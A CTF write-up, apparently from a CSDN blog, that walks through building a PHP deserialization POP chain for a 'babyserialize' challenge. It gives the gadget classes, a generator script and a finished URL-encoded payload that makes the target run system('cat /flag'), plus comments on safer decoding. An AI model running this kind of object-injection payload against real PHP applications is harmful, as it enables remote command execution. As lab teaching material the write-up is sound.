构造pop链编写脚本
[NISACTF 2022]babyserialize(pop链构造与脚本编写详细教学)-CSDN博客
<?php
/**
 * Entry gadget of the chain: its destructor runs automatically when an
 * instance is destroyed, including instances produced by unserialize().
 */
class Begin
{
    // Chain step 6: set to a Then object by the generator script.
    public $name;

    /**
     * Prints one of two greetings depending on whether $name contains an
     * ASCII letter or digit.
     *
     * preg_match() needs a string subject, so an object stored in $name is
     * converted through its __toString() method here. That implicit cast is
     * what hands control to the next class in the chain.
     */
    public function __destruct()
    {
        $greeting = preg_match("/[a-zA-Z0-9]/", $this->name)
            ? "Hello"
            : "Welcome to NewStarCTF 2023!";

        echo $greeting;
    }
}
/**
 * String-cast gadget: converting an instance to a string invokes whatever
 * is stored in $func.
 */
class Then
{
    // Chain step 5: set to a Super object (visibility changed to public in this copy).
    public $func;

    /**
     * Calls $func with no arguments, then returns a fixed string.
     *
     * An object stored in $func is invoked through its __invoke() method,
     * so the property value decides which code runs during the cast.
     */
    public function __toString()
    {
        $callee = $this->func;
        $callee();

        return "Good Job!";
    }
}
/**
 * Method-forwarding gadget: any call to a method this class does not define
 * is redirected to end() on the wrapped object.
 */
class Handle
{
    // Chain step 3: set to a CTF object (visibility changed to public in this copy).
    public $obj;

    /**
     * Runs for every inaccessible method call on the instance.
     *
     * Both the requested method name and its arguments are ignored; the
     * call always lands on $obj->end().
     */
    public function __call($func, $vars)
    {
        $target = $this->obj;
        $target->end();
    }
}
/**
 * Invocation gadget: calling an instance like a function calls getStr() on
 * the wrapped object.
 */
class Super
{
    // Chain step 4: set to a Handle object (visibility changed to public in this copy).
    public $obj;

    /**
     * Runs when the instance is called as a function.
     *
     * If the object in $obj has no getStr() method, the call falls through
     * to that object's __call() handler.
     */
    public function __invoke()
    {
        $receiver = $this->obj;
        $receiver->getStr();
    }

    /**
     * Terminates the script with a fixed message.
     */
    public function end()
    {
        exit("==GAME OVER==");
    }
}
/**
 * Property-unset gadget: end() unsets a property named "log" on the wrapped
 * object.
 */
class CTF
{
    // Chain step 2: set to a WhiteGod object by the generator script.
    public $handle;

    /**
     * Unsets $handle->log.
     *
     * When the wrapped object has no accessible "log" property, PHP routes
     * the operation to that object's __unset() magic method.
     */
    public function end()
    {
        $holder = $this->handle;
        unset($holder->log);
    }
}
/**
 * Final gadget (the sink): unsetting an inaccessible property calls $func
 * with $var as its only argument.
 */
class WhiteGod
{
    // Chain step 1: both properties are filled in by the generator script.
    public $func;
    public $var;

    /**
     * Runs when an inaccessible property of the instance is unset.
     *
     * NOTE(security): the callable and its argument both come from object
     * properties. When the instance was built by unserialize() from request
     * data, the sender chooses which function runs and with what argument.
     * The name of the property being unset is not used.
     */
    public function __unset($var)
    {
        $callee = $this->func;
        $callee($this->var);
    }
}
// Generator for the serialized object graph used in this lab exercise.
// Objects are created from the sink (step 1) outwards to the entry point
// (step 6), each one stored in a property of the next.
//
// Caveat: $b is destroyed when this script finishes, so Begin::__destruct()
// walks the same chain on the machine that runs the generator. Run it only
// inside a disposable lab environment.
//
// Defensive note: the graph has an effect only where an application passes
// request data to unserialize(). Decoding with json_decode(), or calling
// unserialize() with ['allowed_classes' => false], keeps these classes from
// being instantiated, so none of their magic methods run.

// Step 1: sink, holding the function name and argument it will call.
$sink = new WhiteGod();
$sink->func = 'system';
$sink->var = 'cat /flag';

// Step 2: CTF::end() unsets a property on the sink.
$ctf = new CTF();
$ctf->handle = $sink;

// Step 3: Handle::__call() forwards any unknown method to CTF::end().
$forwarder = new Handle();
$forwarder->obj = $ctf;

// Step 4: Super::__invoke() calls getStr(), which Handle does not define.
$invoker = new Super();
$invoker->obj = $forwarder;

// Step 5: Then::__toString() invokes the Super object.
$caster = new Then();
$caster->func = $invoker;

// Step 6: Begin::__destruct() casts $name to a string inside preg_match().
$b = new Begin();
$b->name = $caster;

$encoded = urlencode(serialize($b));
echo $encoded;
?>
payload:
pop=O%3A5%3A%22Begin%22%3A1%3A%7Bs%3A4%3A%22name%22%3BO%3A4%3A%22Then%22%3A1%3A%7Bs%3A4%3A%22func%22%3BO%3A5%3A%22Super%22%3A1%3A%7Bs%3A3%3A%22obj%22%3BO%3A6%3A%22Handle%22%3A1%3A%7Bs%3A3%3A%22obj%22%3BO%3A3%3A%22CTF%22%3A1%3A%7Bs%3A6%3A%22handle%22%3BO%3A8%3A%22WhiteGod%22%3A2%3A%7Bs%3A4%3A%22func%22%3Bs%3A6%3A%22system%22%3Bs%3A3%3A%22var%22%3Bs%3A9%3A%22cat%20%2Fflag%22%3B%7D%7D%7D%7D%7D%7D
注意:urlencode() 会把空格编码成“+”,需要把它改为 %20(上面的 payload 已经改好)。
或者本题可以不用url编码,直接echo serialize($b);